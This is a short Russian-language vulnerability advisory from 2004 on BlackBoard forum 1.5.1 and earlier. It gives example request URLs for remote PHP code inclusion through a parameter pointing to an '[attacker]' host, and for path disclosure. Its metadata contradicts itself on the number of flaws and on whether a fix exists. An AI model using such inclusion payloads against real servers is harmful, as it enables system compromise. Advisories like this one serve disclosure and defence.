Security Lab

Несколько уязвимостей в BlackBoard форуме

Дата публикации:07.10.2004
Всего просмотров:6500
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: BlackBoard Internet Newsboard System 1.x
Уязвимые версии: BlackBoard 1.5.1 и более ранние версии

Описание: Несколько уязвимостей обнаружено в BlackBoard форуме. Удаленный пользователь может выполнить произвольные команды на целевой системе.

1. Выполнение произвольного PHP кода: Пример:

http://[target]/bb_lib/checkdb .inc.php?libpath=http://[attacker]/
2. Раскрытие пути:
http://[target]/bb_lib/checkdb.inc.php

URL производителя:http://blackboard.unclassified.de/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple vulnerabilities in BlackBoard